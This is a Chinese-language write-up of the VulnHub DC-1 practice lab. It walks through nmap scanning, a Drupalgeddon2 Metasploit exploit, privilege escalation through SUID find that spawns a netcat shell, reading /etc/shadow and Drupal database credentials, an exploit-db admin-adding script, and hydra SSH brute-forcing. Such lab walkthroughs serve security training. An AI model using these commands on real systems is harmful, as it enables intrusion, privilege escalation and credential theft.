VulnHub测试靶场DC-1

**

IP:192.168.110.212

**

一.arp-scan -l查看同一区域中存活的主机.

知道了ip然后我们访问主页为下图：

先信息搜集使用nmap进行端口扫描发现扫描的端口如下：

22（ssh）  80(http) .   111(rpcbind)
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35108/tcp6  status
|   100024  1          37240/udp6  status
|   100024  1          37414/udp   status
|_  100024  1          51353/tcp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds

版本：
内容管理系统（CMS）Drupal7
Web 服务器 Apache2.2.22
编程语言 PHP5.4.45
操作系统 Debian
JavaScript 库 jQuery1.4.4

二.信息搜集完之后我是先开始从https://www.exploit-db.com/?type=webapps这个根据他的版本来进行搜索的，但是最后没有结果，最后从主页下的手 ，从主页看出他的cms是Drupal
之后在网上查的关于他的漏洞

三.直接使用msf进行查询search drupal,因为有好多，我先利用的是时间较近的
unix/webapp/drupal_drupalgeddon2模块

直接set设置ip使用run -j,之后直接拿到shell

输入python -c 'import pty;pty.spawn("/bin/sh")'

四.查看他的系统uname -a发现是linux

Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux

之后提权我是在网上找的方式
现在使用suid进行提权先find查找
find / -user root -perm -4000 -print 2>/dev/null
发现Find命令也是以Suid权限运行的话，则将通过find执行的所有命令都会以root权限执行。

五.我先自己创建了一个文本文件然后输入：find chen -exec whoami \;

find chen -exec netcat -lvp 5555 -e /bin/sh \;

六.另一边进行监听

七.提权成功 我先在etc下面的shadow里面找到的flag4:flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWC
继续查看敏感文件/var/www下面找到了1 它提示：每一个好的CMS都需要一个配置文件，你也一样。

八.所以之后我在网上查了drupal 的配置文件在哪里
/sites/default/settings.php
之后先find查询的

cat /var/www/sites/default/settings.php 在这块看到了他的用户名和密码

 'username' => 'dbuser',
 'password' => 'R0ck3t',

既然知道了他的用户和密码就可以进行连接

九.使用cat 查看他的配置文件里的版本信息

cat /var/www/includes/bootstrap.inc | grep VERSION

得到VERSION', '7.24
刚开始使用searchsploit Drupal都是一些python脚本

 python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.110.212 -u chen -p chen

十.从刚刚使用python脚本添加的用户和密码来进行登陆

十一.因为前面已经知道他的用户名（在shadow里面找的用户名所以现在可以直接拿九头蛇爆破）

hydra -l flag4 -P pass.txt  ssh://192.168.110.212

十二.现在可知道他的 密码为orange
进行连接成功！！！！！

用户名：flag4
密码：orange